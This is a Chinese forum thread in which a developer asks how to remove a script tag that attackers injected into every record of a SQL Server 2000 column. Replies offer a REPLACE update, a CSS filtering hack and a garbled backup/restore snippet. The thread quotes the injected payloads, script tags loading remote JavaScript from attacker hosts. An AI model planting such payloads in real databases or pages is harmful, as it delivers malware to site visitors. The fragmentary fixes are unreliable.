紧急求助,SQL2000数据库,某个字段后面被别人加了这样一段代码: <</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!网上搜了下,同样被黑的人还不少!在这里提醒各位同行们注意,同时想跟高手讨教个解决方案
所有记录的同一个字段内容后面加了这段代码,有没有办法通过一条SQL语句删掉?
我已经修改了SQL密码,是不是还存在什么安全隐患呢?问题解决再给五十分!
所有记录的同一个字段内容后面加了这段代码,有没有办法通过一条SQL语句删掉?
我已经修改了SQL密码,是不是还存在什么安全隐患呢?问题解决再给五十分!
解决方案 »
- 获取存储过程返回值
- 实体数据模型问题。。
- 求高手帮忙写一个格式化字符串的类方法
- 用过freetextbox或者FCKeditor的进来看看.
- 有谁知道Daab中Oracle怎么联啊,救命啊???
- 向另一页面传递参数的问题
- 求助:SQL2000数据库一字段被大量插入"></title><script src=http://s.see9.us/s.js></script><!--字样的文本
- 大家一起探讨不容许重复登录的问题?
- Editcommandcloumn 在*.vb文件中如何声名和使用?(code-behind)
- 这会是Visual Studio .NET 的什么问题呢?大家都来讨论!
- 如何去除textbox里面的\r\n?
- Calendar1 选择日期时期时,总是出现看不到的现象。
update tablename set colname=replace(colname,'加入的字符串','')
2.检查恶意脚本在你页面启作用的地方,然后查看你的对应处理代码
3.对文章中的脚本进行过滤。之前在蓝色理想看到的.在CSS里面定义iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。
(
pkid int
)insert into test select 1 union select 2backup database mydb to disk='c:\abc.bak'drop database mydbGo开始恢复:create database mydb
gorestore database mydb from disk='c:\abc.bak' with replace数据库我也不是很熟悉。所以。
update tablename set colname=replace(colname,'</title></pre>><script</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!','')
成功执行了,可是没有效果,郁闷了!